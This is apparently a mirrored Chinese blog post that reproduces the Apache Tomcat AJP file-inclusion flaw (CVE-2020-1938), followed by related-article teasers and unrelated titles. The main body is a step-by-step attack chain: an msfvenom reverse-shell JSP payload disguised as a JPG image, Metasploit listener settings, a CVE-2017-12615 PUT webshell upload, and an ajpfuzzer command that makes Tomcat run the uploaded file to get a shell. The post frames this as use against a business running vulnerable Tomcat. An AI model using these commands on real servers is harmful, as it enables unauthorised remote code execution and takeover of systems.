tomcat ajp协议安全限制绕过漏洞_Apache Tomcat文件包含漏洞(CVE20201938)复现
msfvenom -p java/jsp_shell_reverse_tcp LHOST=本机IP LPORT=监听端口 R >muma.jpg
OK,已经生成了一个文件名为muma.jpg的图片木马。接下来我们利用一下metasploit中的exploit/multi/handler后门模块进行攻击。监听
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 本机IP
set lport 监听端口
3、任意文件上传这里我们顺便就用Apache Tomcat 8.5.19来做一个任意文件上传漏洞的复现,在服务器上修改配置文件/conf/web.xml,允许tomcat用PUT方式提交,使其产生一个任意文件上传的漏洞,不多说,自行脑补CVE-2017-12615。修改tomcat配置文件/conf/web.xml,添加readonly参数,属性改为false。抓取tomcat页面数据包,修改提交方式为PUT,构造payload,上传webshell访问一下这个webshell就可以远程执行任意命令了,当然,如果权限不足的话还得提权,这里就不做演示了。4、反弹shell回到正题(接第2篇)假设说某个运行在该版本tomcat上的业务有个上传点,我们在上传目录upload上传了我们刚才生成的反弹图片马。下载一个AJP包构造器ajpfuzzer_v0.6.jar
URL:https://github.com/doyensec/ajpfuzzer/releases
运行java -jarajpfuzzer_v0.6.jar执行connect 目标ip 8009连接目标端口
java -jar ajpfuzzer_v0.6.jar
connect 目标IP 8009
执行下面命令构造并发送AJP包,其中/upload/muma.jpg为上传的木马路径,其中ma.jsp可以换为任意该web项目中没有的jsp文件,这样tomcat才会去调用DefaultServlet.
forwardrequest 2 "HTTP/1.1" "/ma.jsp" 192.168.194.133 192.168.194.133 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:ma.jsp","javax.servlet.include.path_info:/upload/muma.jpg","javax.servlet.include.servlet_path:/"
请求发送成功后,ma.jpg被当做jsp解析,成功拿到shell5、Tomcat Ajp协议文件读取漏洞用大佬写的EXP直接任意文件读取
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
KillBoy安全实验室回归技术本质,引领实战潮流
tomcat ajp协议安全限制绕过漏洞_Apache Tomcat文件包含漏洞(CVE20201938)复现相关推荐
- 【文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例
目录 1 文件包含漏洞 1.1 文件包含漏洞概述 1.2 文件包含漏洞的形成原因/条件 1.3 危害 2 文件包含漏洞简单测试实例 2.1 测试环境 2.2 实例一:本地文件包含 2.3 实例二:远程 ...
- java 文件包含漏洞_远程文件包含漏洞(pikachu)
漏洞介绍 File Inclusion(文件包含漏洞)概述 文件包含,是一个功能.在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件. 比如 ...
- tomcat ajp协议安全限制绕过漏洞_Apache tomcat 文件包含漏洞复现(CVE20201938)
漏洞背景 Tomcat是由Apache软件基金会下属的Jakarta项目开发的一个Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer ...
- tomcat ajp协议安全限制绕过漏洞_国家信息安全漏洞共享平台发布Apache Tomcat漏洞安全公告...
2月22日消息 国家信息安全漏洞共享平台(CNVD)近日发布了一份关于 Apache Tomcat 存在文件包含漏洞的安全公告,具体如下: 安全公告编号:CNTA-2020-0004 2020 年 1 ...
- 【文件包含漏洞03】文件包含漏洞的空字符绕过及六种利用方式
目录 1 内容简介 本节概述 实验环境 2 空字符绕过 2.1 实验基础知识 2.2 实验环境及准备 2.3 实验步骤 2.3.1 正常访问 2.3.2 空字符绕过 2.3.3 额外的方式 3 利用方 ...
- 【文件包含漏洞-02】文件包含漏洞分类与原理及其空字符安全绕过实验
文件包含漏洞 文件包含(file inclusion)漏洞,当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include ...
- 【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell
文件包含漏洞的利用 读取敏感文件 我们可以利用文件包含漏洞读取任意文件,读取文件的时候有利用条件 目标主机文件存在(目标文件的路径.绝对路径.相对路径) 具有文件可读权限 提交参数http://loc ...
- 【文件包含漏洞-01】文件包含漏洞成因与其包含语句及其相关配置
文件包含 概述:程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含. 程序开发人员都希望代码更加灵活,所以通常会把被 ...
- 文件上传漏洞之——远程文件包含漏洞(RFI)
定义 如果php.ini的配置选项allow_url_include为On的话,文件包含函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞.利用远程文件包含漏洞,可以直接执行任意命令 原理 同本 ...
最新文章
- 操作系统学习:Linux0.12初始化详细流程-进程1加载虚拟盘和根文件系统安装
- 用Debug函数实现API函数的跟踪
- 分布式版本控制系统Git——使用GitStack+TortoiseGit 图形界面搭建Git环境(服务器端及客户端)(转)...
- python中a=str(int(a))什么意思_如何解决TypeError:只能将str(而不是“int”)连接到str - python...
- Docker container与宿主进程相互隔离的实现原理
- 各种数的由来 真是神奇又有趣
- php 获取域名部分,PHP 获取顶级域名 获取域名的函数 parseHost()
- CSblog的学习记录
- 【Silverlight】Bing Maps学习系列(一):开发前的准备工作
- 所需即所获:像 IDE 一样使用 vim
- 【引用】各种软件视频教学
- RetinaFace论文解读 --- RetinaFace: Single-stage Dense Face Localisation in the Wild
- 计算机网络之广域网基础以及华为eNSP实验配置
- 指令(MISP技术的指令集)
- 【笔记】QQ输入法手写识别汉字web版
- 怎么绘制等高线计算机软件,绘制等高线(LanDTM)
- Hive虚拟内存溢出报错:2.9GB of 2.1GB virtual memory used. Killing container.解决办法
- java xml 查询_java对xml进行查询操作代码
- 运筹学----线性规划组成三要素、可行域、最优值、线性规划问题数学模型一般形式、线性规划问题数学模型标准形式
- 2019年最新最全的医疗网站优化方案
热门文章
- spring体系结构_了解Spring Web应用程序体系结构:经典方法
- JUnit 5和Selenium –使用Selenium内置的`PageFactory`实现页面对象模式
- 带有Spring Boot 2支持的Apache Camel 2.22发布
- 用Jackson编写大型JSON文件
- Java编程语言的历史和未来
- Kafka REST Proxy for MapR Streams入门
- 基于javafx的五子棋_JavaFX中基于表达式的PathTransitions
- java避免空指针异常_避免Java中的空指针异常
- app engine_Google App Engine:在您自己的域中托管应用程序
- 零垃圾创建数百万个对象